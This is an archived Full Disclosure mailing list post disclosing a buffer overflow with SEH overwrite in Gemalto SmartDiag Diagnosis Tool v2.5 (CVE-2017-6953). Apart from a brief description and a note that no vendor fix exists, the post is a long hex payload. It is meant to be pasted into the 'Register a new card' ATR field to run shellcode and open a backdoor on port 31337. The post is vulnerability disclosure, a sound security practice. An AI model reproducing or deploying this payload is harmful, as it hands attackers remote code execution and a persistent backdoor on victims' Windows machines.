Full Disclosure mailing list archives
Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution
From: Majid Alqabandi <majid () q8-host com>
Date: Tue, 9 May 2017 22:48:39 +0300
# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution # Date: 16-03-2017 # Software Link: http://support.gemalto.com/index.php?id=download_tools # Exploit Author: Majid Alqabandi # Contact: https://www.linkedin.com/in/majidalqabandi/ # CVE: CVE-2017-6953 # Category: Local - command execution - Buffer Overflow - SEH Overwrite. # Vendor Notified: 17-04-2016 1. Description SymDiag.exe is vulnerable to buffer overflow, SEH overwrite. When trying to (Register a new card), Input fields are vulnerable to stack overflow attack which leads to code execution and other possible security threats. 2. Proof of Concept The following PoC is provided code will: - Exploit the vulnerability. - Execute shell code. - Create a backdoor on port 31337. To exploit, start SmartDiag.exe tool, choose "Register a new card", on the ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag v2.5): 52834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000572b0410477f40008c214100f494400041ed40003b4140003552011078ab0110010000009cf2021000100000328b031040000000d02203100120400026e6400090909090e2f5001090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc3158140358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec47604506d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf5530d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bdc7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c538f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 3. Solution: Vendor has been informed and confirmed the issue, no fix is available yet from vendor. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution Majid Alqabandi (May 10)